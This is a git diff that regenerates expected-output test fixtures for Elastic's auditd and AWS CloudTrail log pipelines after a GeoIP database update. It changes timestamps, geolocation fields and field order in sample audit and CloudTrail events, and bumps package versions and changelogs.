@@ -1505,7 +1505,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329474700Z", + "ingested": "2021-12-14T14:35:17.193791342Z", "original": "type=USER_MGMT msg=audit(1481076992.521:393): pid=1264 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 msg='op=add-home-dir id=1000 exe=\"/usr/sbin/useradd\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -1557,7 +1557,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329486100Z", + "ingested": "2021-12-14T14:35:17.193791855Z", "original": "type=USYS_CONFIG msg=audit(1481076993.000:402): pid=1232 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 msg='changing system time exe=\"/usr/sbin/hwclock\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -1601,14 +1601,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1624,7 +1624,7 @@ "action": [ "changed-role-to" ], - "ingested": "2021-12-02T11:18:11.329497300Z", + "ingested": "2021-12-14T14:35:17.193792249Z", "original": "type=USER_ROLE_CHANGE msg=audit(1481077043.140:415): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='pam: default-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 selected-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 exe=\"/usr/sbin/sshd\" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=89.160.20.156 terminal=ssh res=success'", "kind": "event", "outcome": "success" 
@@ -1663,14 +1663,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1683,7 +1683,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-02T11:18:11.329508300Z", + "ingested": "2021-12-14T14:35:17.193792648Z", "original": "type=USER_LOGIN msg=audit(1481077043.193:421): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe=\"/usr/sbin/sshd\" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=89.160.20.156 terminal=/dev/pts/0 res=success'", "kind": "event", "action": [ @@ -1733,7 +1733,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329519300Z", + "ingested": "2021-12-14T14:35:17.193793065Z", "original": "type=USER_LOGOUT msg=audit(1481077049.033:424): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe=\"/usr/sbin/sshd\" hostname=? addr=? terminal=/dev/pts/0 res=success'", "kind": "event", "action": [ @@ -1778,7 +1778,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329531700Z", + "ingested": "2021-12-14T14:35:17.193793451Z", "original": "type=CONFIG_CHANGE msg=audit(1481077231.371:478): auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 op=\"add_rule\" key=(null) list=4 res=1", "kind": "event", "action": [ @@ -1822,7 +1822,7 @@ }, "event": { "action": "cwd", - "ingested": "2021-12-02T11:18:11.329552600Z", + "ingested": "2021-12-14T14:35:17.193793832Z", "original": "type=CWD msg=audit(1481077231.371:479): cwd=\"/home/some_user\"", "kind": "event" }, 
@@ -1842,7 +1842,7 @@ }, "event": { "action": "path", - "ingested": "2021-12-02T11:18:11.329564300Z", + "ingested": "2021-12-14T14:35:17.193794227Z", "original": "type=PATH msg=audit(1481077231.371:479): item=0 name=\"/sbin/auditctl\" inode=17367907 dev=08:01 mode=0100750 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:auditctl_exec_t:s0 objtype=NORMAL", "kind": "event" }, @@ -1877,7 +1877,7 @@ }, "event": { "action": "unknown[1329]", - "ingested": "2021-12-02T11:18:11.329571900Z", + "ingested": "2021-12-14T14:35:17.193794616Z", "original": "type=UNKNOWN[1329] msg=g\u0005", "kind": "event" }, @@ -1896,7 +1896,7 @@ }, "event": { "action": "bprm_fcaps", - "ingested": "2021-12-02T11:18:11.329585800Z", + "ingested": "2021-12-14T14:35:17.193794989Z", "original": "type=BPRM_FCAPS msg=audit(1481077308.360:529): fver=0 fp=0000000000000000 fi=0000000000000000 fe=0 old_pp=0000000000000000 old_pi=0000000000000000 old_pe=0000000000000000 new_pp=0000001fffffffff new_pi=0000000000000000 new_pe=0000001fffffffff", "kind": "event" }, @@ -1926,7 +1926,7 @@ }, "event": { "action": "sockaddr", - "ingested": "2021-12-02T11:18:11.329593500Z", + "ingested": "2021-12-14T14:35:17.193795393Z", "original": "type=SOCKADDR msg=audit(1481078424.953:688): saddr=02000050A9FEA9FE0000000000000000", "kind": "event" }, @@ -1947,7 +1947,7 @@ }, "event": { "action": "ckaddr", - "ingested": "2021-12-02T11:18:11.329603200Z", + "ingested": "2021-12-14T14:35:17.193795792Z", "original": "type=CKADDR msg=audit(1481078553.346:737): saddr=02000050A9FEA9FE0000000000000000", "kind": "event" }, @@ -1967,7 +1967,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329617Z", + "ingested": "2021-12-14T14:35:17.193796182Z", "original": "type=DAEMON_END msg=audit(1481078697.892:7799): auditd normal halt, sending auid=? pid=? subj=? res=success", "kind": "event", "action": [ 
diff --git a/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-useradd.log-expected.json b/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-useradd.log-expected.json index f3212a38094..66d018dd117 100644 --- a/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-useradd.log-expected.json +++ b/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-useradd.log-expected.json @@ -14,7 +14,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-11-30T10:23:47.122698251Z", + "ingested": "2021-12-14T14:35:19.942115636Z", "original": "type=ADD_GROUP msg=audit(1610903553.686:584): pid=2940 uid=0 auid=1000 ses=14 msg='op=adding group to /etc/group id=1004 exe=\"/usr/sbin/groupadd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", "kind": "event", "action": [ @@ -71,7 +71,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-11-30T10:23:47.122702082Z", + "ingested": "2021-12-14T14:35:19.942118172Z", "original": "type=ADD_GROUP msg=audit(1610903553.710:586): pid=2940 uid=0 auid=1000 ses=14 msg='op=adding group to /etc/gshadow id=1004 exe=\"/usr/sbin/groupadd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", "kind": "event", "action": [ @@ -128,7 +128,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-11-30T10:23:47.122703292Z", + "ingested": "2021-12-14T14:35:19.942118572Z", "original": "type=ADD_GROUP msg=audit(1610903553.710:587): pid=2940 uid=0 auid=1000 ses=14 msg='op= id=1004 exe=\"/usr/sbin/groupadd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", "kind": "event", "action": [ @@ -184,7 +184,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-11-30T10:23:47.122704357Z", + "ingested": "2021-12-14T14:35:19.942118950Z", "original": "type=ADD_USER msg=audit(1610903553.730:591): pid=2945 uid=0 auid=1000 ses=14 msg='op=adding user id=1004 exe=\"/usr/sbin/useradd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", "kind": "event", "action": [ 
@@ -241,7 +241,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-11-30T10:23:47.122705381Z", + "ingested": "2021-12-14T14:35:19.942119281Z", "original": "type=USER_ACCT msg=audit(1610903553.814:593): pid=2948 uid=0 auid=1000 ses=14 msg='pam_tally2 uid=1004 reset=0 exe=\"/sbin/pam_tally2\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/2 res=success'", "kind": "event", "action": [ @@ -293,7 +293,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-11-30T10:23:47.122706355Z", + "ingested": "2021-12-14T14:35:19.942119622Z", "original": "type=USER_CHAUTHTOK msg=audit(1610903558.174:594): pid=2953 uid=0 auid=1000 ses=14 msg='op=PAM:chauthtok acct=\"charlie\" exe=\"/usr/bin/passwd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", "kind": "event", "action": [ @@ -350,7 +350,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-11-30T10:23:47.122707376Z", + "ingested": "2021-12-14T14:35:19.942119948Z", "original": "type=USER_AUTH msg=audit(1610903558.178:595): pid=2954 uid=0 auid=1000 ses=14 msg='op=PAM:authentication acct=\"root\" exe=\"/usr/bin/chfn\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", "kind": "event", "action": [ @@ -403,7 +403,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-11-30T10:23:47.122738488Z", + "ingested": "2021-12-14T14:35:19.942120282Z", "original": "type=USER_ACCT msg=audit(1610903558.178:596): pid=2954 uid=0 auid=1000 ses=14 msg='op=PAM:accounting acct=\"root\" exe=\"/usr/bin/chfn\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", "kind": "event", "action": [ diff --git a/packages/auditd/manifest.yml b/packages/auditd/manifest.yml index 9aa6da84b61..73754161782 100644 --- a/packages/auditd/manifest.yml +++ b/packages/auditd/manifest.yml @@ -1,6 +1,6 @@ name: auditd title: Auditd -version: 1.3.0 +version: 1.3.1 release: ga description: Collect logs from Linux audit daemon with Elastic Agent. type: integration 
diff --git a/packages/aws/changelog.yml b/packages/aws/changelog.yml index 9266b854727..437eb9d9dd6 100644 --- a/packages/aws/changelog.yml +++ b/packages/aws/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.7.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.7.0" changes: - description: Add integration for AWS Network Firewall diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log-expected.json index 6231a4dd28d..e9b520569fe 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log-expected.json @@ -14,20 +14,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-change-password-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-change-password-json.log-expected.json index 9dcab5261ad..6b314e7ee9e 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-change-password-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-change-password-json.log-expected.json 
@@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { @@ -23,6 +16,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"0123456789012\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\"},\"eventTime\":\"2020-01-09T00:09:33Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"ChangePassword\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46\",\"errorCode\":\"AccessDeniedException\",\"errorMessage\":\"An unknown error occurred\",\"requestParameters\":null,\"responseElements\":null,\"requestID\":\"EXAMPLE-5204-4fed-9c60-9c6EXAMPLE\",\"eventID\":\"EXAMPLE-b92f-48bb-8c4c-efeEXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -65,16 +62,12 @@ "name": "Spider" }, "version": "1.16.310" - } - }, - { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "cloud": { "region": "us-east-1", "account": { 
@@ -90,6 +83,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"0123456789012\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\"},\"eventTime\":\"2020-01-09T00:03:36Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"ChangePassword\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46\",\"requestParameters\":null,\"responseElements\":null,\"requestID\":\"EXAMPLE-5c16-4eda-9724-EXAMPLE\",\"eventID\":\"EXAMPLE-35a7-4c25-9fc7-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -130,7 +127,10 @@ "name": "Spider" }, "version": "1.16.310" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log-expected.json index 69fec10edc1..5163692301d 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log-expected.json 
@@ -1,17 +1,32 @@ { "expected": [ { + "cloud": { + "region": "us-east-2", + "account": { + "id": "111122223333" + } + }, + "@timestamp": "2014-07-16T15:49:27.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "JohnDoe" + ] + }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -23,24 +38,6 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, - "tags": [ - "preserve_original_event" - ], - "cloud": { - "region": "us-east-2", - "account": { - "id": "111122223333" - } - }, - "@timestamp": "2014-07-16T15:49:27.000Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "JohnDoe" - ] - }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AIDACKCEVSQ6C2EXAMPLE\",\"arn\":\"arn:aws:iam::111122223333:user/JohnDoe\",\"accountId\":\"111122223333\",\"userName\":\"JohnDoe\"},\"eventTime\":\"2014-07-16T15:49:27Z\",\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\",\"requestParameters\":null,\"responseElements\":{\"ConsoleLogin\":\"Success\"},\"additionalEventData\":{\"MobileVersion\":\"No\",\"LoginTo\":\"https://console.aws.amazon.com/s3/\",\"MFAUsed\":\"No\"},\"eventID\":\"3fcfb182-98f8-4744-bd45-10aEXAMPLE\"}", "provider": "signin.amazonaws.com", 
@@ -100,20 +97,38 @@ "name": "Other" }, "version": "24.0." - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "cloud": { + "region": "us-east-2", + "account": { + "id": "111122223333" + } + }, + "@timestamp": "2014-07-08T17:35:27.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "JaneDoe" + ] + }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -125,24 +140,6 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, - "tags": [ - "preserve_original_event" - ], - "cloud": { - "region": "us-east-2", - "account": { - "id": "111122223333" - } - }, - "@timestamp": "2014-07-08T17:35:27.000Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "JaneDoe" - ] - }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AIDACKCEVSQ6C2EXAMPLE\",\"arn\":\"arn:aws:iam::111122223333:user/JaneDoe\",\"accountId\":\"111122223333\",\"userName\":\"JaneDoe\"},\"eventTime\":\"2014-07-08T17:35:27Z\",\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\",\"errorMessage\":\"Failed authentication\",\"requestParameters\":null,\"responseElements\":{\"ConsoleLogin\":\"Failure\"},\"additionalEventData\":{\"MobileVersion\":\"No\",\"LoginTo\":\"https://console.aws.amazon.com/sns\",\"MFAUsed\":\"No\"},\"eventID\":\"11ea990b-4678-4bcd-8fbe-625EXAMPLE\"}", "provider": "signin.amazonaws.com", 
@@ -203,7 +200,10 @@ "name": "Other" }, "version": "24.0." - } + }, + "tags": [ + "preserve_original_event" + ] }, { "cloud": { @@ -219,14 +219,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-access-key-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-access-key-json.log-expected.json index fe958a8e1bd..0ffe55825e9 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-access-key-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-access-key-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { 
@@ -24,6 +17,10 @@ "Bob" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-08T15:12:16Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-08T20:43:06Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"CreateAccessKey\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"userName\":\"Bob\"},\"responseElements\":{\"accessKey\":{\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"status\":\"Active\",\"userName\":\"Bob\",\"createDate\":\"Jan 8, 2020 8:43:06 PM\"}},\"requestID\":\"EXAMPLE-823a-48dc-8fa9-EXAMPLE\",\"eventID\":\"EXAMPLE-3cab-40f8-938b-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -85,7 +82,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json index 00bd7e5645d..ce1c161bf24 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json 
@@ -1,17 +1,32 @@ { "expected": [ { + "cloud": { + "region": "us-east-2", + "account": { + "id": "123456789012" + } + }, + "@timestamp": "2014-03-06T17:10:34.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "Alice" + ] + }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -23,24 +38,6 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, - "tags": [ - "preserve_original_event" - ], - "cloud": { - "region": "us-east-2", - "account": { - "id": "123456789012" - } - }, - "@timestamp": "2014-03-06T17:10:34.000Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "Alice" - ] - }, "event": { "original": "{\"eventVersion\":\"1.0\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2014-03-06T15:15:06Z\"}}},\"eventTime\":\"2014-03-06T17:10:34Z\",\"eventSource\":\"ec2.amazonaws.com\",\"eventName\":\"CreateKeyPair\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx\",\"requestParameters\":{\"keyName\":\"mykeypair\"},\"responseElements\":{\"keyName\":\"mykeypair\",\"keyFingerprint\":\"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21\",\"keyMaterial\":\"\u003csensitiveDataRemoved\u003e\"}}", "provider": "ec2.amazonaws.com", 
@@ -95,7 +92,10 @@ "device": { "name": "Other" } - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-trail-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-trail-json.log-expected.json index 1839c2927b0..b86259807b5 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-trail-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-trail-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-west-2", "account": { 
@@ -23,6 +16,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"sessionIssuer\":{},\"webIdFederationData\":{},\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-08T15:12:16Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-08T15:30:25Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"CreateTrail\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"name\":\"TEST-trail\",\"s3BucketName\":\"TEST-cloudtrail-bucket\",\"includeGlobalServiceEvents\":true,\"isMultiRegionTrail\":true,\"enableLogFileValidation\":true,\"kmsKeyId\":\"\",\"isOrganizationTrail\":false},\"responseElements\":{\"name\":\"TEST-trail\",\"s3BucketName\":\"TEST-cloudtrail-bucket\",\"includeGlobalServiceEvents\":true,\"isMultiRegionTrail\":true,\"trailARN\":\"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail\",\"logFileValidationEnabled\":true,\"isOrganizationTrail\":false},\"requestID\":\"EXAMPLE-5149-4cf2-be99-EXAMPLE\",\"eventID\":\"EXAMPLE-d04b-4eff-833a-EXAMPLE\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "cloudtrail.amazonaws.com", @@ -82,7 +79,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-user-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-user-json.log-expected.json index 5fc1e895b73..413dc250e79 100644 
--- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-user-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-user-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-2", "account": { @@ -24,6 +17,10 @@ "Bob" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.0\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\"},\"eventTime\":\"2014-03-24T21:11:59Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"CreateUser\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"aws-cli/1.3.2 Python/2.7.5 Windows/7\",\"requestParameters\":{\"userName\":\"Bob\"},\"responseElements\":{\"user\":{\"createDate\":\"Mar 24, 2014 9:11:59 PM\",\"userName\":\"Bob\",\"arn\":\"arn:aws:iam::123456789012:user/Bob\",\"path\":\"/\",\"userId\":\"EXAMPLEUSERID\"}}}", "provider": "iam.amazonaws.com", @@ -83,7 +80,10 @@ "name": "Other" }, "version": "1.3.2" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-virtual-mfa-device-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-virtual-mfa-device-json.log-expected.json index 4a9c4f4240d..1884ebe14de 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-virtual-mfa-device-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-virtual-mfa-device-json.log-expected.json 
